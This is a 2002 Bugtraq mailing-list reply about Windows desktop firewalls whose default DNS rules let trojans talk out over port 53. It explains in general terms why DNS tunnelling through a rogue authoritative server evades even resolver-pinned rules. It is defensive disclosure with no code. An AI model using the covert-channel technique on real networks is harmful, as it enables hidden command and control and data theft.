From: Frank Knobbe [fknobbe@knobbeits.com]
Sent: Friday, May 10, 2002 11:35 PM
To: Christian decoder Holler
Cc: bugtraq@securityfocus.com
Subject: Re: Flaw caused by default rulesets in many desktop firewalls
under windows

On Fri, 2002-05-10 at 13:44, Christian decoder Holler wrote:
> Several Desktop-Firewalls for Windows, such as Tiny 
> Personal Firewall 2.0 or ATGuard, maybe also others, allow 
> DNS resolving by default. That allows reversed trojans to 
> connect to a server on port 53 and send/receive commands 
> and informations without the user knowing it. The firewall 
> permits any communication to any server on port 53 UDP. I 
> wrote a small trojan in VB and tested it with Tiny Personal 
> Firewall 2.0 and it worked.
> 
> Solution: Change the default rules for DNS to a fixed host, 
> for example to the DNS server of the ISP or the DNS server 
> in the local network.


Unfortunately that does not prevent tunnels through DNS. Sophisticated
tunnels slip data through DNS requests (typically for a domain where a
rogue DNs server is answering, as a tunnel endpoint). Data is
piggybacked on the queries/responses. These tunnels don't care through
which DNS server you send the request, ISP or local. In either case the
request queries the root server for the gtld server, which refers to the
rogue authoratative DNS server when finally the packet hits the pocket
in the socket on the port...

Only DNS query scrubbing through some kind of smart DNS content proxy
can prevent DNS tunnels. Are there any available yet? Let me know if you
find a decent one...

Regards,
Frank